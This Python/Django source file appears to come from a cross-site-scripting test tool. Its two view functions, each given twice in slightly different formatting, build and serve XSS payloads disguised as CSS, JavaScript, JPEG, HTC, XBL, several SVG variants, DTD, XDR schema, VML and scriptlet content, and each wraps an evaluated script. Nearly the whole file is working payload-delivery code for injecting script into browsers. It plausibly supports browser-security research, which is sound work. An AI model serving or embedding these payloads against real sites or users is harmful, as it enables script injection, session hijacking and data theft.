def xss(request, vector_id):
v = Vector.objects.get(id=vector_id)
xss_instance = build_vector(v, xss_payload(), "xss")
return HttpResponse(xss_instance.decode('string_escape'))
def xss(request, vector_id):
v = Vector.objects.get(id=vector_id)
xss_instance = build_vector(v, xss_payload(), "xss")
return HttpResponse(xss_instance.decode("string_escape"))
def inc(request, context, vector_id, context_id, encoding_id, type):
#return a given payload as an include like .js or .css etc...
response = HttpResponse()
if context == "xss":
source = xss_payload()
elif context == "test":
baseurl = request.build_absolute_uri("/")
domain = Site.objects.get_current()
source = test_payload(vector_id, context_id, encoding_id, baseurl,
domain)
else:
return HttpResponse("WTF BBQ?")
if type == "css":
css = """ background-image: url('javascript:%(eval_p)s;');
background-image: expression(%(eval_p)s);
-moz-binding:url("%(xssmoz)s");
}{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}"""
eval_p = eval_payload(source)
response['Content-type'] = 'text/css'
response.write(css % {'eval_p': eval_p, 'xssmoz': ''})
return response
elif type == "js":
response['Content-type'] = 'application/javascript'
response.write(source)
return response
elif type == "jpg":
response['Content-type'] = 'image/jpeg'
response.write(source)
return response
elif type == "htc":
eval_p = eval_payload(source)
htc = """
<?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x>
<PUBLIC:COMPONENT TAGNAME="xss">
<PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main()
{
""" + source + """;
}
</SCRIPT>"""
response['Content-type'] = 'text/plain'
response.write(htc % {
'eval_p': eval_p,
})
return response
elif type == "html":
return render_to_response('payload.html', {
'source': source,
})
elif type == "xbl":
eval_p = eval_payload(source)
xbl = """
<?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>"""
return HttpResponse(xbl % {
'eval_p': eval_p,
})
elif type == "svg":
eval_p = eval_payload(source)
svg = """
<form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" type="submit"/></form>
"""
response['Content-type'] = 'image/svg+xml'
response.write(svg % {
'eval_p': eval_p,
})
return response
elif type == "svg2":
svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>"""
response['Content-type'] = 'image/svg+xml'
eval_p = eval_payload(source)
response.write(svg % {
'eval_p': eval_p,
})
return response
elif type == "svg3":
svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient> </svg>"""
response['Content-type'] = 'image/svg+xml'
eval_p = eval_payload(source)
response.write(svg % {
'eval_p': eval_p,
})
return response
elif type == "svg4":
svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>"""
response['Content-type'] = 'image/svg+xml'
eval_p = eval_payload(source)
response.write(svg % {
'eval_p': eval_p,
})
return response
elif type == "xxe":
xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>"""
eval_p = eval_payload(source)
return HttpResponse(xxe % {
'eval_p': eval_p,
})
elif type == "dtd":
dtd = """<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='%(eval_p)s'/>">"""
eval_p = eval_payload(source)
return HttpResponse(dtd % {
'eval_p': eval_p,
})
elif type == "xdr":
xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>"""
eval_p = eval_payload(source)
return HttpResponse(xdr % {
'eval_p': eval_p,
})
elif type == "evt":
evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>"""
eval_p = eval_payload(source)
return HttpResponse(evt % {
'eval_p': eval_p,
})
elif type == "vml":
vml = """<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>"""
eval_p = eval_payload(source)
return HttpResponse(vml % {
'eval_p': eval_p,
})
elif type == "sct":
sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>"""
eval_p = eval_payload(source)
return HttpResponse(sct % {
'eval_p': eval_p,
})
elif type == "php":
event = """Event: load\ndata: \n\n"""
eval_p = eval_payload(source)
response['Content-type'] = 'application/x-dom-event-stream'
response.write(event)
return response
else:
return HttpResponse("fail !")
def inc(request, context, vector_id, context_id, encoding_id, type):
# return a given payload as an include like .js or .css etc...
response = HttpResponse()
if context == "xss":
source = xss_payload()
elif context == "test":
baseurl = request.build_absolute_uri("/")
domain = Site.objects.get_current()
source = test_payload(vector_id, context_id, encoding_id, baseurl, domain)
else:
return HttpResponse("WTF BBQ?")
if type == "css":
css = """ background-image: url('javascript:%(eval_p)s;');
background-image: expression(%(eval_p)s);
-moz-binding:url("%(xssmoz)s");
}{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}"""
eval_p = eval_payload(source)
response["Content-type"] = "text/css"
response.write(css % {"eval_p": eval_p, "xssmoz": ""})
return response
elif type == "js":
response["Content-type"] = "application/javascript"
response.write(source)
return response
elif type == "jpg":
response["Content-type"] = "image/jpeg"
response.write(source)
return response
elif type == "htc":
eval_p = eval_payload(source)
htc = (
"""
<?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x>
<PUBLIC:COMPONENT TAGNAME="xss">
<PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main()
{
"""
+ source
+ """;
}
</SCRIPT>"""
)
response["Content-type"] = "text/plain"
response.write(htc % {"eval_p": eval_p})
return response
elif type == "html":
return render_to_response("payload.html", {"source": source})
elif type == "xbl":
eval_p = eval_payload(source)
xbl = """
<?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>"""
return HttpResponse(xbl % {"eval_p": eval_p})
elif type == "svg":
eval_p = eval_payload(source)
svg = """
<form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" type="submit"/></form>
"""
response["Content-type"] = "image/svg+xml"
response.write(svg % {"eval_p": eval_p})
return response
elif type == "svg2":
svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>"""
response["Content-type"] = "image/svg+xml"
eval_p = eval_payload(source)
response.write(svg % {"eval_p": eval_p})
return response
elif type == "svg3":
svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient> </svg>"""
response["Content-type"] = "image/svg+xml"
eval_p = eval_payload(source)
response.write(svg % {"eval_p": eval_p})
return response
elif type == "svg4":
svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>"""
response["Content-type"] = "image/svg+xml"
eval_p = eval_payload(source)
response.write(svg % {"eval_p": eval_p})
return response
elif type == "xxe":
xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>"""
eval_p = eval_payload(source)
return HttpResponse(xxe % {"eval_p": eval_p})
elif type == "dtd":
dtd = """<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='%(eval_p)s'/>">"""
eval_p = eval_payload(source)
return HttpResponse(dtd % {"eval_p": eval_p})
elif type == "xdr":
xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>"""
eval_p = eval_payload(source)
return HttpResponse(xdr % {"eval_p": eval_p})
elif type == "evt":
evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>"""
eval_p = eval_payload(source)
return HttpResponse(evt % {"eval_p": eval_p})
elif type == "vml":
vml = """<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>"""
eval_p = eval_payload(source)
return HttpResponse(vml % {"eval_p": eval_p})
elif type == "sct":
sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>"""
eval_p = eval_payload(source)
return HttpResponse(sct % {"eval_p": eval_p})
elif type == "php":
event = """Event: load\ndata: \n\n"""
eval_p = eval_payload(source)
response["Content-type"] = "application/x-dom-event-stream"
response.write(event)
return response
else:
return HttpResponse("fail !")
